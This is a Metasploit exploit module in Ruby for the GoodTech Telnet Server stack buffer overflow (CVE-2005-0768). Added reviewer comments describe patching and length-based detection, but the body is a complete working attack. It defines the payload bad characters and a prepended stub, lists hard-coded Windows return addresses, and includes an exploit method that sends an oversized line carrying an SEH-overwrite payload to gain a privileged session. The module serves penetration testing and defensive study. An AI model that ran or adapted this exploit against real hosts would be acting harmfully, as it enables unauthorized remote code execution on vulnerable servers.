rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/telnet/goodtech_telnet.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit remote exploit module for the GoodTech Systems Telnet Server
# stack buffer overflow tracked as CVE-2005-0768 (OSVDB 14806, BID 12815).
#
# Reviewer notes for defenders:
# * The module description states that versions prior to 5.0.7 are affected,
#   so the remediation the page supports is upgrading to 5.0.7 or later.
# * The request built in #exploit is a single line of more than 10,000 bytes
#   sent to the service port (2380 unless RPORT is overridden). The filler is
#   random on every run, so a length threshold on that port is a more durable
#   detection than a content signature.
# * Both targets rely on hard-coded return addresses tied to the listed
#   Windows builds, and the module's reliability, stability and side effects
#   are all recorded as unknown.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata and the default remote port.
  #
  # @param info [Hash] metadata supplied by the framework; merged with the
  #   values below through update_info.
  def initialize(info = {})
    advisories = [
      [ 'CVE', '2005-0768' ],
      [ 'OSVDB', '14806'],
      [ 'BID', '12815' ],
    ]

    # Payload constraints: at most 400 bytes, none of the listed bytes may
    # appear, and a fixed stub is placed ahead of the encoder.
    # NOTE(review): the stub looks like a stack-pointer adjustment; confirm
    # by disassembly before relying on that reading.
    payload_constraints = {
      'Space' => 400,
      'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
      'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44"
    }

    # Each target pairs an OS build with the return address used for it.
    supported_targets = [
      [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],
      [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
    ]

    # None of the three assessment fields has been filled in for this module.
    assessment = {
      'Reliability' => UNKNOWN_RELIABILITY,
      'Stability' => UNKNOWN_STABILITY,
      'SideEffects' => UNKNOWN_SIDE_EFFECTS
    }

    module_info = {
      'Name' => 'GoodTech Telnet Server Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in GoodTech Systems Telnet Server
        versions prior to 5.0.7. By sending an overly long string, an attacker can
        overwrite the buffer and control program execution.
      },
      'License' => MSF_LICENSE,
      'Author' => 'MC',
      'References' => advisories,
      'DefaultOptions' => {
        'EXITFUNC' => 'thread'
      },
      'Payload' => payload_constraints,
      'Platform' => 'win',
      'Targets' => supported_targets,
      # Declares that a successful run yields a privileged session.
      'Privileged' => true,
      'DisclosureDate' => '2005-03-15',
      'DefaultTarget' => 0,
      'Notes' => assessment
    }

    super(update_info(info, module_info))

    default_port = Opt::RPORT(2380)
    register_options([default_port])
  end

  # Sends one oversized line to the service and hands off to the payload
  # handler.
  #
  # The line starts as 10020 characters of random English text that avoids
  # the payload's bad characters. The data returned by generate_seh_payload
  # for the selected target's return address is written over it from offset
  # 10012; when that data is longer than the 8 characters remaining, the
  # slice assignment lets the string grow past 10020. Two CRLF pairs
  # terminate the request.
  def exploit
    filler_length = 10020
    seh_offset = 10012

    connect

    request = rand_text_english(filler_length, payload_badchars)
    seh_record = generate_seh_payload(target.ret)

    request[seh_offset, seh_record.length] = seh_record

    print_status("Trying target #{target.name}...")

    # Same bytes as concatenating the terminator at send time.
    request << "\r\n\r\n"
    sock.put(request)

    handler
    disconnect
  end
end